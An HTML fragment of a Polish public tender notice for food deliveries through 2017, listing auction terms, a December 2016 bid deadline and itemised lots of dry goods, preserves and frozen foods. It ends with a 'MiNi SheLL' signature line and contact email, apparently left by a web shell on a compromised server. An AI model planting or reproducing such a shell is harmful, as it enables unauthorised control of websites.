                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Najniższa cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Umowa może zostać przedłużona aneksem, jednak na okres nie dłuższy niż do
   końca marca 2018 r. przy zachowaniu poniższych warunków:
  - ilości zakupionych artykułów będą nie większe niż 25% całości artykułów umowy.
  - kwota należności za zakupione artykuły będzie nie wyższa niż 25% należności umownej. 
  - pozostałe warunki umowy bez zmian.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 13/12/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>artykuły spożywcze sypkie <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Andruty-wafle cukrzycowe op. do 110g	kg	50
2	Budyń bez cukru  śmietankowy, waniliowy, czekoladowy, malinowy  op.do 1 kg	kg	135
3	Bulion drobiowy Winiary op. do 2 kg	kg	4
4	Chrupki krakowskie a 350 g	szt. 	175
5	Ciastka deserowe różne, których termin przydatności do spożycia wynosi min. 14 dni a max 45 dni od daty produkcji	kg	160
6	Ciastka herbatniki szkolne	kg	110
7	Ciastka krakersy Lajkonik lub równoważne o wart. energetycznej 476 kcal,
21 g tłuszczu, 62 g węglowodanów na 100g,  op . - 180 g 	kg.	30
8	Ciastka typu Grześki w czekoladzie a 36 g	kg	65
9	Cukier a 1 kg			kg	2500
10	Cukier puder a 0,5 kg	kg	70
11	Cukier waniliowy op. do 1 kg	kg	6,5
12	Cukierki w czekoladzie  mieszanka krakowska	kg	14
13	Cynamon op. do 1kg	kg	1,5
14	Czekolada dla diabetyków a 100 g	kg.	70
15	Czosnek granulowany op. do 1 kg	kg	17
16	Drożdże piekarskie  op  do 100 g	kg	8
17	Galaretka owocowa op. do 1 kg, o zawartości żelatyny wieprzowej, smak: truskawkowy wiśniowy ,brzoskwiniowy, agrestowy itp	kg	210
18	Herbata ekspres. Owocowa ze sznurkiem różne smaki  Vitax op. po 20 szt.	op.	350
19	Herbata liściasta Madras op.do 1 kg	kg	130
20	Kakao Wawel extra lub równoważne op. 100g, sypkie , b/cukru , ciemne niskotłuszczowe o zaw. 10-12% w 100g suchej masy	kg	13
21	Kasza jęczmienna sypka , średnia  op. do 1 kg	kg	210
22	Kasza manna sypka ,  op. do 1 kg	kg	115
23	Kawa zbożowa Kujawianka lub równoważna op.do 0,5 kg składniki: żyto prażone 60%, Jęczmień 20%, cykoria , burak prażony	kg	150
24	Ketchup Roleski lub równoważny  łagodny , op plastikowe do 0,5 kg, gęsty produkowany z pomidorów(205 g pomidorów w 100 g ketchupu), o intensywnej czerwonej barwie, b/konserwantów, zagęstników i dodatków E	kg	90
25	Ketchup Roleski lub równoważny  pikantny , op plastikowe do 0,5 kg, gęsty produkowany z pomidorów(205 g pomidorów w 100 g ketchupu), o intensywnej czerwonej barwie, b/konserwantów, zagęstników i dodatków E	kg	90
26	Kisiel bez cukru op. do 1 kg smak: malinowy , wiśniowy , truskawkowy, ctrynowy, morelowy,  itp	kg	125
27	Kleik ryżowy błyskawiczny Bobovita lub równoważny a 200 g , zawierający 99,9% mąki ryżowej  	kg	25
28	Kminek op. do 1 kg	kg	1
29	Konserwa rybna śledź w pomidorach op.  300 -330g , zawartość śledzia min. 55% w 100 g produktu	kg	45
30	Konserwa rybna śledź w oleju op.  300 -330g , zawartość śledzia min. 55% w 100 g produktu	kg	45
31	Kwasek cytrynowy op. do 1 kg	kg	16
32	Liście laurowe op do 1 kg	kg	1,3
33	Majeranek op do 0,2 kg	kg	1,5
34	Majonez Roleski lub równoważny op. do 1 kg , stołowy o zawartości tłuszczu nie mniej niż 51% i jaj kurzych nie mniej niż 11% gęsty , b/konserwantów , barwa kremowa	kg	340
35	Makaron drobny 4-ro jajeczny , wysokiej jakości  zachowujący kształt po ugotowaniu op. a 05 kg	kg	240
36	Makaron nitki 4-ro jajeczny  wysokiej jakości  zachowujący kształt po ugotowaniu op. a 05 kg     	kg	200
37	Makaron różny 4-ro jajeczny wysokiej jakości  zachowujący kształt po ugotowaniu op. a 05 kg op. 	kg	400
38	Makaron łazanki 4-ro jajeczny wysokiej jakości  zachowujący kształt po ugotowaniu op. a 05 kg op.	kg	100
39	Makrela wędzona	kg	150
40	Mąka pszenna tortowa op. do 1 kg typ 450, sypka ,barwa jasno kremowa	kg	1950
41	Mąka ziemniaczana op. do 1 kg	kg	80
42	Miód naturalny wielokwiatowy płynny op. do 400g	kg	60
43	Musztarda delikatesowa Roleski  lub równoważna op. do 0,5 kg, b/konserwantów , zagęstników , stabilizatorów i dodatków E	kg	60
44	Ocet 10 % op. do 0,5 l	l	30
45	Olej butelka do 1 l , roślinny z pierwszego tłoczenia ,o niskiej zawartości kwasu erukowego , nadający się do pieczenia i smażenia	l	420
46	Oregano opak do 50g	kg	0,5
47	Paluszki słone Lajkonik lub równoważne , mające 374 kcal  op do300 g	kg 	110
48	Pieprz czarny mielony op. do 1 kg	kg	15
49	Płatki kukurydziane Corn Flakes op. do 1 kg b/dodatków smakowych	kg	75
50	Płatki owsiane górskie , barwa swoista dla produktu op. 0,5 - 1 kg klasa I	kg	145
51	Proszek do pieczenia op. do 50 g	kg	2
52	Przyprawa do drobiu złocista Kamis  lub równoważna op. do 1 kg o zawartości: sól ,papryka słodka,14%,gorczyca biała, czosnek 5,8%,kolendra, kurkuma, koziradka2,4%,chili2%, imbir ,cynamon ,kmin ,goździki ,gałka muszkatałowa 	kg	3,5
53	Przyprawa do mięsa Kamis lub równoważna  op. do 1 kg o zawartości : sól , czosnek ,gorczyca ,kminek ,kolendra ,papryka słodka ,majeranek, rozmaryn, chili, czomber	kg	1,3
54	Przyprawa do potraw Kucharek lub równoważna op. do 1 kg, o zawartości
min 15,5% suszonych warzyw	kg	75
55	Przyprawa w płynie do zup Winiary a 1 l	l	200
56	Rodzynki op. od 0,5 do 1 kg , owoce średniej wielkości typu sułtańskie	kg	31
57	Ryż barwa biała , długoziarnisty ,  op. do 1 kg , klasa I	kg	470
58	Sól kuchenna jodowana op. do 1 kg	kg	630
59	Śledzie solone Matjas op. do 3 kg po odcieku 2 kg	kg	100
60	Śledzie solone Matjas op. do 5 kg po odcieku 4 kg	
kg	100
61	Śmietanka śnieżka op. do 60 g	kg	20
62	Śliwki suszone bez pestek op do 250g	kg	8
63	Wiórka kokosowe op. do 100 g	kg	13
64	Ziele angielskie op. do 1 kg	kg	3
65	Żelatyna spożywcza wieprzowa op. do 1 kg	kg	40
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Najniższa cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>przetwory owocowe i warzywne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Barszcz biały kiszony z mąki żytniej  op do 0,5 l butelki	l	160
2	Barszcz czerwony koncentrat Krakus lub równoważny op do 0,3 l zawierający zagęszczony sok  z buraka  czer. 59,2%	l	64
3	Brzoskwinie w syropie a 850g w puszce ,bez pestek krojone w połówki	szt	25
4	Chrzan tarty Polonais op 200g min 62 % chrzanu ,102kcal, tłuszczu 07g,białko2,7g na100g produktu lub równoważny	kg	130
5	Dżem bez cukru op do 400 g z kawałkami owoców różne smaki, b/konserwantów min 40% owoców	kg	330
6	Groszek konserw.op.do 400 g z otwieraczem, sałatkowy średnie ziarna	kg	165
7	Koncent pomidorowy 30%Pudliszki ze świeżych pomidorów b/żadnych dodatków min104 kcal, tłuszcz 0,8g, węglowod. 18 g   op do 1 kg lub równoważny	kg	180
8	Koncent pomidorowy 28 -30%Pudliszki ze świeżych pomid. op do 200g b/żadnych dodatków min104 kcal, tłuszcz 0,8g, węglowod. 18 g ,   lub równoważny	kg	60
9	Kukurydza konser.op.do 400gz otwieraczem , sałatkowa, półsłodka	kg	205
10	Marmolada owocowa  twarda o smaku różanym op do 1 kg	kg	6
11	Papryka konserw. czerwona półsłodka op do 1 l	kg	220
12	Pieczarki marynowane. op do 1l grzyby całe w zalewie octowej	kg	180
13	Sałatka szwedzka o. kapusty p do 1 l	kg	220
14	Sałatka z czerwonej kapusty  z dod. jabłka o smaku łagodnym op do 1 l	kg	80
15	Sok pomarańczowy100%  zagęszczonego soku pomarańcz. w 100 ml.45 kcal, wit.C 6 mg op 200 ml TYMBARK lub równoważny.	l	205
16	Nektar czarna porzeczka  zaw. sok z czarnych porzeczek z zagęszczonego soku  min.(25%) , zaw. w 100 ml 49 kcal,wit. C 6 mg. TYMBARK lub równoważny
 a 1 l.
	l	325
17	Sok pomarańcz. 100% z zagęszczonego soku pomarańcz zaw.w100 ml.45kcal 
wit. C 6 mg TYMBARK lub równoważny op 1 l	l	300
18	Sok multiwitamina z zagęszczonych soków z: jabłek (60%) i pomarańczy (22%), sok z marchwi z zagęszczonego soku (12%), przeciery z: bananów (3%), brzoskwiń, gujawy i papai, soki z zagęszczonych soków z: ananasów (2%), mango (0,5%), marakui (0,1%), liczi (0,05%), figi kaktusowej, kiwi i limonek, zaw. w 100 ml.51 kcal, wit. C-12 mg. - TYMBARK lub równoważny opak.1 l.
	l	325
19	Sok jabłkowy 100 %  z zagęszczonego soku jabłkowego zaw. w 100 ml. 43 kcal, wit. C 6 mg-TYMBARK lub równoważny opak. 1 l.
	l	300
20	Syrop o smaku malinowym, wysokosłodzony,  pasteryzowany, bez substancji konserwujących zaw. min.3% zagęszczonego soku malinowego
	l	110
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Najniższa cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>mrożonki<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Borówki mrożone opak.do 2,5 kg	kg	100
2	Brokuły różyczki pakowane 2000-2500 g	kg	70
3	Brukselka mrożona  op. do 2,5 kg	kg	60
4	Fasola szparagowa mrożona zielona op do 2,5 kg	kg	95
5	Fasola szparagowa mrożona żółta op do 2,5 kg	kg	95
6	Filet z dorsza mrożony bez skóry SHP( bez glazury)barwa biała	kg	150
7	Filet z mintaja mroż. b/skóry SHP( bez glazury)barwa biała	kg	350
8	Filet z morszczuka mrożony b/skóry SHP(bez glazury)	kg	350
9	Groszek mrożony zielony op. do 2,5 kg 	kg	85
10	Kalafior mrożony różyczki op. 2000-2500 g	kg	240
11	Lody wielosmakowe op. do 150g	l	120
12	Mieszanka kompotowa mrożona   5-cio składnikowa .op do 10 kg	kg	2520
13	Szpinak mrożony  mielony  op. do 2,5 kg	kg	200
14	Śliwy b/pestek mrożone  op. do 2,5 kg	kg	120
15	Truskawki    mrożone op. do 2,5 kg	kg	310
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Najniższa cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com